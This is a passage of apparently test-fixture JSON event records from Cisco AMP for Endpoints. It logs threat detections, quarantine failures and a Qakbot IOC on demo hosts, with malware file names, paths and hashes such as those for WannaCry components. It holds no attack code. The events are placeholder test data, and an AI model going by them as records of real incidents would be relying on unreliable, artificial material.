found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":573000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870786","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"","file_path":"","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239050946806000,"timestamp":1610637528,"timestamp_nanoseconds":587000000,"date":"2021-01-14T15:18:48+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419239046651838535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239046651838000,"timestamp":1610637527,"timestamp_nanoseconds":932000000,"date":"2021-01-14T15:18:47+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419239046651838535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1492807649948000000,"timestamp":1610635719,"timestamp_nanoseconds":948000000,"date":"2021-01-14T14:48:39+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610635719,"start_date":"2021-01-14T14:48:39+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Unknown","file_name":"yuyfhonu.exe","file_path":"/C:/Users/johndoe/AppData/Roaming/Microsoft/Yuyfhonuu/yuyfhonu.exe","identity":{"sha256":"6b7d5fdf4b9d42a985cf861c5ef28f5fa914b418c22e4bf5b56bac12251bcd6c"},"parent":{"disposition":"Clean","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":773000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine 
Failure","event_type_id":2164260880,"detection_id":"6419229335730782278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":664000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":570000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":430000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782275","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":368000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782274","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":134000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782273","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":102000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782272","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":102000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782271","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782270","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814972","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":773000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":648000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 